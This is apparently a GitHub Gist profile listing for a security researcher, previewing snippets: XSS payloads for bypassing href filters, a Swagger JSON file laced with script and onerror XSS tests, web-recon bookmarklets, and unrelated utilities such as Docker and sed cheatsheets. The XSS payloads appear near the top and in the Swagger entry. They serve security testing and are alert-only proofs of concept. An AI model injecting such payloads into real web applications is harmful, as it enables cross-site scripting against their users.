mrrootsec / href_bypass.html

Created April 10, 2025 06:15 — forked from hackerscrolls/href_bypass.html

XSS payloads for href

	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)

mrrootsec / Docker Cheatsheet

Last active April 7, 2025 07:17

Docker cheatsheet

	# Docker Cheatsheet

	## Tutorial series

	Get started with Docker: [https://docs.docker.com/engine/getstarted/](https://docs.docker.com/engine/getstarted/)

	## Installation

	### Linux

mrrootsec / getRawPageContent

Created January 14, 2025 16:44 — forked from henningpohl/getRawPageContent

Bookmarklet to crawl a page for iframes, embeds and links and render those as easy to access list.

	(function(){
	// http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/
	// http://subsimple.com/bookmarklets/jsbuilder.htm

	if(window.jQuery === undefined) {
	var script = document.createElement("script");
	script.src = "http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js";
	script.onload = script.onreadystatechange = function() {
	bookmarklet();
	};

mrrootsec / server.py

Created December 14, 2024 08:03

Simple utility to share files using flask server

	from flask import Flask, request, jsonify
	import os

	app = Flask(__name__)

	# Directory where uploaded files will be stored
	UPLOAD_FOLDER = './uploads'
	os.makedirs(UPLOAD_FOLDER, exist_ok=True)
	app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER

mrrootsec / python-venv-tutorial.md

Created November 14, 2024 05:33 — forked from ryumada/python-venv-tutorial.md

Python Virtual Environment Tutorial

How to start Python Development with Python Environment
2. Installing a package using specific version

mrrootsec / ponelat-evil-xss.swagger.json

Created September 18, 2024 15:50 — forked from shockey/ponelat-evil-xss.swagger.json

	{
	"swagger" : "2.0",
	"info" : {
	"version" : "1.0.100",
	"title" : "title<script language=\"javascript\">alert('1')</script>",
	"description" : "description with markdown format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
	},
	"tags" : [ {
	"name" : "Admin",
	"description" : "tag with markdown"

mrrootsec / awake.ps1

Created September 13, 2024 11:07

Prevent PC from sleeping - Win 11

	Add-Type -TypeDefinition @"

	using System;
	using System.Runtime.InteropServices;

	public class MouseSimulator {
	[DllImport("user32.dll", SetLastError = true)]
	private static extern void mouse_event(uint dwFlags, int dx, int dy, uint dwData, int dwExtraInfo);
	private const uint MOUSEEVENTF_MOVE = 0x0001;

mrrootsec / Current page wordlist.js

Last active September 1, 2024 03:57

https://x.com/renniepak/status/1780916964925345916 - credit to Renniepak - generate wordlist from current page - Added save & close button

javascript:(function() {     const e = document.documentElement.innerText.match(/[a-zA-Z_\-]+/g),           n = [...new Set(e)].sort(),           popup = document.createElement('div');      popup.style.position = 'fixed';     popup.style.top = '10%';     popup.style.left = '10%';     popup.style.width = '80%';     popup.style.height = '80%';     popup.style.backgroundColor = 'black';     popup.style.color = 'white';     popup.style.zIndex = '10000';     popup.style.padding = '20px';     popup.style.overflowY = 'scroll';     popup.style.border = '2px solid green';     popup.style.borderRadius = '10px';      const title = document.createElement('h1');     title.innerText = 'Current page wordlist';     title.style.color = 'green';     popup.appendChild(title);      const wordList = document.createElement('div');     wordList.innerHTML = n.join('<br>');     popup.appendChild(wordList);      const closeButton = document.createElement('button');     closeButton.innerText = 'Close';     closeButton.style.position = 

mrrootsec / Pulling Endpoints, Params, JS Files.js

Last active August 1, 2024 12:06

https://x.com/Jhaddix/status/1794427067830030494/photo/1 - Credits to Jhaddix - Enhanced with Dark UI and Save buttons for each operation endpoints,params,js

	javascript:(function() {
	var scripts = document.getElementsByTagName("script");
	var regex = /(?<=(\"\|\%27\|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"\|\'\|\%60))/g;
	var jsRegex = /(?<=(\"\|\'\|\%60))(?:\/\|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"\|\'\|\%60))/g;
	const results = new Set();
	const paramMap = new Map();
	const jsFiles = new Set();

	function processContent(t, src) {
	var e = t.matchAll(regex);

mrrootsec / sed_snippets.sh

Created July 29, 2024 14:41 — forked from r2k0/sed_snippets.sh

sed examples

	##FILE SPACING:

	# double space a file
	sed G

	# double space a file which already has blank lines in it. Output file
	# should contain no more than one blank line between lines of text.
	sed '/^$/d;G'

	# triple space a file

MOHAMMAD SAQLAIN mrrootsec

Python Virtual Environment Tutorial